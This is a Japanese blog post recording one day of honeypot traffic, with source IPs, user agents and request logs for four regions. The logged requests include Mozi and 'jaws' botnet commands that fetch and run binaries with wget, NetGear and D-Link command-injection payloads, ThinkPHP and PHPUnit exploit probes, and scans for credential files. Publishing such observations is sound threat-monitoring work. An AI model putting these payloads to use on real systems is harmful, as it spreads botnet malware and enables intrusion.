コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/02/06 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2022/02/06分です。

特徴
共通

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
/.envへのスキャン行為

Location:JP

NetGear製品の脆弱性を狙うアクセス
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
45.81.234.68に関する不正通信
UserAgentがHello, Worldであるアクセス

を確認しました。

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為
45.81.234.68に関する不正通信
UserAgentがHello, Worldであるアクセス

を確認しました。

Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
.jsへのスキャン行為
Apache Solrへのスキャン行為
45.81.234.68に関する不正通信
UserAgentがHello, Worldであるアクセス

を確認しました。

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Laravelへのスキャン行為
phpMyAdminへのスキャン行為
45.81.234.68に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 185.44.81.114/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:167 (前日比:-103)
US:総アクセス数:206 (前日比:132)
UK:総アクセス数:40 (前日比:-5)
SG:総アクセス数:179 (前日比:-10)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
108 3.16.161.138 United States
1 4.16.142.230 United States
2 20.115.166.223 United States
3 23.90.128.10 United States
1 45.229.54.35 Brazil
1 52.91.159.54 United States
3 62.171.132.199 Germany
1 62.171.150.168 Germany
1 85.202.169.113 Netherlands
1 95.202.182.126 Sweden
1 104.248.248.84 United States
5 107.170.127.19 United States
1 109.237.103.9 Russia
1 109.237.103.123 Russia
11 128.199.2.117 United Kingdom
3 135.125.246.110 France
12 135.125.246.189 France
1 137.184.146.197 United States
1 139.162.125.139 Netherlands
1 172.105.89.161 United States
1 185.244.164.69 Germany
3 185.254.196.217 Ukraine
3 185.254.196.218 Ukraine
1 209.17.96.98 United States

UserAgent一覧

件数 UserAgent
8 -
1 Hello, World
1 Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84)
1 MMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24
1 Mozila/5.0
1 Mozilla/5.0 (Linux; Android 4.3; SPH-L710 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.99 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36
11 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.210.0 Safari/532.0
1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.4 Safari/532.0
26 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
9 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
99 python-requests/2.27.1
1 python-requests/2.9.1

リクエスト内容一覧

件数 Method Request Protocol
1 -
2 \x16\x03\x01\x01\xfa\x01
2 \x16\x03\x01
1 CONNECT 45[.]81[.]234[.]68:4444 HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
1 GET /.env.bak HTTP/1.1
27 GET /.env HTTP/1.1
2 GET /.git/config HTTP/1.1
5 GET //asdf[.]php HTTP/1.1
5 GET //dashboard/phpinfo.php HTTP/1.1
1 GET //debug/default/view.html HTTP/1.1
5 GET //debug/default/view?panel=config HTTP/1.1
1 GET //debug/default/view HTTP/1.1
1 GET //frontend/web/debug/default/view HTTP/1.1
5 GET //i[.]php HTTP/1.1
5 GET //index[.]php HTTP/1.1
5 GET //info[.]php HTTP/1.1
5 GET //infophp[.]php HTTP/1.1
5 GET //infos[.]php HTTP/1.1
5 GET //linusadmin-phpinfo.php HTTP/1.1
5 GET //old_phpinfo[.]php HTTP/1.1
4 GET //php-info.php HTTP/1.1
5 GET //php[.]php HTTP/1.1
5 GET //php_info[.]php HTTP/1.1
5 GET //phpinfo[.]php HTTP/1.1
5 GET //phpversion[.]php HTTP/1.1
5 GET //pinfo[.]php HTTP/1.1
1 GET //sapi/debug/default/view HTTP/1.1
5 GET //temp[.]php HTTP/1.1
5 GET //test[.]php HTTP/1.1
5 GET //time[.]php HTTP/1.1
1 GET //web/debug/default/view HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /?config HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /assets../.git/config HTTP/1.1
1 GET /aws.yml HTTP/1.1
1 GET /c.php HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
3 GET /config/getuser?index=0 HTTP/1.1
1 GET /content../.git/config HTTP/1.1
1 GET /css../.git/config HTTP/1.1
1 GET /events../.git/config HTTP/1.1
1 GET /images../.git/config HTTP/1.1
1 GET /img../.git/config HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /js../.git/config HTTP/1.1
1 GET /lib../.git/config HTTP/1.1
1 GET /media../.git/config HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//95[.]202[.]182[.]126:50001/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /static../.git/config HTTP/1.1
2 GET http[:]//httpbin[.]org/ip HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
1 POST /info.php HTTP/1.1
1 POST /phpinfo.php HTTP/1.1
1 POST /wpinfo.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 8.31.2.94 United States
3 23.90.128.10 United States
12 43.132.160.145 Singapore
14 45.146.165.37 Russia
1 45.154.255.147 United Kingdom
8 47.252.3.54 United States
12 51.79.29.48 Canada
1 61.219.11.151 Taiwan
2 62.171.132.199 Germany
1 62.171.150.168 Germany
2 94.232.43.63 Russia
1 109.237.103.9 Russia
1 109.237.103.123 Russia
1 142.11.239.62 United States
132 161.97.103.72 Germany
1 162.142.125.10 United States
1 167.248.133.119 United States
1 172.105.89.161 United States
1 172.245.45.219 United States
1 183.136.226.3 China
1 185.196.220.62 Netherlands
1 185.244.164.69 Germany
5 185.254.196.223 Ukraine
1 192.241.210.212 United States
1 209.17.96.98 United States

UserAgent一覧

件数 UserAgent
23 -
1 Hello, World
1 Mozila/5.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
14 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
132 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.53 Safari/534.30
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1 Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.21 (KHTML, like Gecko) Chrome/19.0.1041.0 Safari/535.21
21 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4 Mozilla/5.0 (compatible;)
1 Mozilla/5.0 zgrab/0.x
2 curl/7.75.0

リクエスト内容一覧

件数 Method Request Protocol
1 -
2 \x03
1 \x16\x03\x01\x01\x9d\x01
2 \x16\x03\x01\x01\xa7\x01
1 \x16\x03\x01\x01\xb4\x01
2 \x16\x03\x01\x02
4 \x16\x03\x01
1 \x16\x03\x02\x01\x9a\x01
1 \x16\x03\x03\x01H\x01
1 \x16\x03\x03\x01V\x01
1 \x16\x03\x03\x01\x99\x01
2 \x16\x03\x03\x01\xa5\x01
1 CONNECT 45[.]81[.]234[.]68:4444 HTTP/1.1
21 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
2 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /HNAP1 HTTP/1.1
2 GET /PMA/index.php?lang=en HTTP/1.1
2 GET /PMA2014/index.php?lang=en HTTP/1.1
2 GET /PMA2015/index.php?lang=en HTTP/1.1
1 GET /PMA2017/index.php?lang=en HTTP/1.1
2 GET /PMA2021/index.php?lang=en HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /_phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /admin/db/index.php?lang=en HTTP/1.1
2 GET /admin/index.php?lang=en HTTP/1.1
1 GET /admin/pMA/index.php?lang=en HTTP/1.1
2 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
1 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
2 GET /admin/web/index.php?lang=en HTTP/1.1
1 GET /administrator/PMA/index.php?lang=en HTTP/1.1
3 GET /administrator/db/index.php?lang=en HTTP/1.1
2 GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /administrator/pma/index.php?lang=en HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
2 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/db-admin/index.php?lang=en HTTP/1.1
1 GET /db/dbadmin/index.php?lang=en HTTP/1.1
1 GET /db/dbweb/index.php?lang=en HTTP/1.1
2 GET /db/myadmin/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
3 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /db/webadmin/index.php?lang=en HTTP/1.1
3 GET /db/webdb/index.php?lang=en HTTP/1.1
1 GET /db/websql/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
1 GET /evox/about HTTP/1.1
4 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/db/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/pMA/index.php?lang=en HTTP/1.1
2 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/web/index.php?lang=en HTTP/1.1
1 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /php-my-admin/index.php?lang=en HTTP/1.1
2 GET /php-myadmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.0-english/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.1-english/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.1/index.php?lang=en HTTP/1.1
3 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin_/index.php?lang=en HTTP/1.1
1 GET /phpMyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
3 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2021/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
3 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
2 GET /pma/index.php?lang=en HTTP/1.1
1 GET /pma2011/index.php?lang=en HTTP/1.1
2 GET /pma2012/index.php?lang=en HTTP/1.1
1 GET /pma2013/index.php?lang=en HTTP/1.1
1 GET /pma2016/index.php?lang=en HTTP/1.1
1 GET /pma2018/index.php?lang=en HTTP/1.1
2 GET /pma2019/index.php?lang=en HTTP/1.1
1 GET /pma2021/index.php?lang=en HTTP/1.1
1 GET /program/index.php?lang=en HTTP/1.1
1 GET /robots.txt HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /sql/myadmin/index.php?lang=en HTTP/1.1
3 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
2 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
2 GET /sql/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /sql/sql/index.php?lang=en HTTP/1.1
1 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
2 GET /sql/webdb/index.php?lang=en HTTP/1.1
1 GET /sql/websql/index.php?lang=en HTTP/1.1
1 GET /text4041644028016 HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
2 GET http[:]//httpbin[.]org/ip HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?script/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /sdk HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
3 23.90.128.10 United States
7 45.137.21.134 Bangladesh
8 45.146.165.37 Russia
1 61.219.11.151 Taiwan
1 62.171.132.199 Germany
1 62.171.150.168 Germany
5 71.6.199.23 United States
2 94.232.43.63 Russia
1 109.237.103.9 Russia
1 109.237.103.123 Russia
1 167.94.138.44 United States
1 167.94.138.46 United States
1 167.248.133.47 United States
1 172.105.89.161 United States
1 185.244.164.69 Germany
1 193.142.146.229 Germany
1 197.156.131.115 Kenya
1 203.236.109.113 South Korea
1 209.17.97.122 United States
1 221.214.195.222 China

UserAgent一覧

件数 UserAgent
16 -
1 Hello, World
1 Mozila/5.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.4 (KHTML, like Gecko) Chrome/6.0.481.0 Safari/534.4
3 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
7 Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
2 \x03
2 \x16\x03\x01
1 CONNECT 45[.]81[.]234[.]68:4444 HTTP/1.1
3 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
4 GET /dispatch.asp HTTP/1.1
3 GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET http[:]//httpbin[.]org/ip HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?script/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /HNAP1/ HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 13.92.214.100 United States
2 20.150.210.254 United States
3 23.90.128.10 United States
6 45.146.165.37 Russia
5 51.79.29.48 Canada
2 61.219.11.151 Taiwan
1 62.171.132.199 Germany
1 62.171.150.168 Germany
1 72.47.16.108 United States
2 94.232.43.63 Russia
1 95.130.176.18 Russia
1 103.28.70.140 United States
1 103.105.177.133 India
133 104.154.248.12 United States
1 109.237.103.9 Russia
1 109.237.103.123 Russia
1 113.88.208.93 China
1 120.85.182.244 China
1 140.228.29.27 United States
2 157.230.216.203 United States
1 162.142.125.219 United States
1 172.105.89.161 United States
1 185.15.103.143 Spain
3 185.244.164.69 Germany
4 185.254.196.223 Ukraine
1 209.17.97.122 United States
1 212.192.241.207 Czechia

UserAgent一覧

件数 UserAgent
14 -
1 Hello, World
2 Hello, world
1 Mozila/5.0
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
132 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.3 Safari/533.2
18 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.0 Safari/532.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0

リクエスト内容一覧

件数 Method Request Protocol
2 -
2 \x03
2 \x16\x03\x01
3 CONNECT 45[.]81[.]234[.]68:4444 HTTP/1.1
19 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
2 GET /MyAdmin/index.php?lang=en HTTP/1.1
1 GET /PMA/index.php?lang=en HTTP/1.1
2 GET /PMA2011/index.php?lang=en HTTP/1.1
1 GET /PMA2013/index.php?lang=en HTTP/1.1
1 GET /PMA2014/index.php?lang=en HTTP/1.1
3 GET /PMA2015/index.php?lang=en HTTP/1.1
1 GET /PMA2016/index.php?lang=en HTTP/1.1
1 GET /PMA2018/index.php?lang=en HTTP/1.1
1 GET /PMA2019/index.php?lang=en HTTP/1.1
2 GET /PMA2020/index.php?lang=en HTTP/1.1
1 GET /PMA2021/index.php?lang=en HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
2 GET /_phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /_phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /admin/db/index.php?lang=en HTTP/1.1
1 GET /admin/pMA/index.php?lang=en HTTP/1.1
3 GET /admin/web/index.php?lang=en HTTP/1.1
1 GET /administrator/PMA/index.php?lang=en HTTP/1.1
1 GET /administrator/admin/index.php?lang=en HTTP/1.1
1 GET /administrator/db/index.php?lang=en HTTP/1.1
1 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/db-admin/index.php?lang=en HTTP/1.1
1 GET /db/dbadmin/index.php?lang=en HTTP/1.1
2 GET /db/dbweb/index.php?lang=en HTTP/1.1
3 GET /db/index.php?lang=en HTTP/1.1
1 GET /db/myadmin/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /db/webadmin/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /mysql-admin/index.php?lang=en HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
2 GET /mysql/db/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
2 GET /mysql/index.php?lang=en HTTP/1.1
1 GET /mysql/pMA/index.php?lang=en HTTP/1.1
1 GET /mysql/pma/index.php?lang=en HTTP/1.1
3 GET /mysql/web/index.php?lang=en HTTP/1.1
1 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
3 GET /php-my-admin/index.php?lang=en HTTP/1.1
1 GET /php-myadmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-4.9.7-english/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5.1.1-english/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
4 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin_/index.php?lang=en HTTP/1.1
3 GET /phpMyadmin/index.php?lang=en HTTP/1.1
2 GET /phpmy/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2012/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
3 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2021/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
3 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
2 GET /pma2012/index.php?lang=en HTTP/1.1
1 GET /pma2013/index.php?lang=en HTTP/1.1
2 GET /pma2014/index.php?lang=en HTTP/1.1
1 GET /pma2017/index.php?lang=en HTTP/1.1
1 GET /pma2019/index.php?lang=en HTTP/1.1
1 GET /pma2020/index.php?lang=en HTTP/1.1
1 GET /pma2021/index.php?lang=en HTTP/1.1
2 GET /program/index.php?lang=en HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+185[.]44[.]81[.]114/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
2 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
3 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
1 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /sql/sql/index.php?lang=en HTTP/1.1
1 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
2 GET /sql/webdb/index.php?lang=en HTTP/1.1
2 GET /sql/websql/index.php?lang=en HTTP/1.1
2 GET /sqlmanager/index.php?lang=en HTTP/1.1
2 GET http[:]//httpbin[.]org/ip HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /result%3Fhl%3Den%26meta%3Dvvnwppnloxhwtqccppbyhqmrwyswqen HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 PRI * HTTP/2.0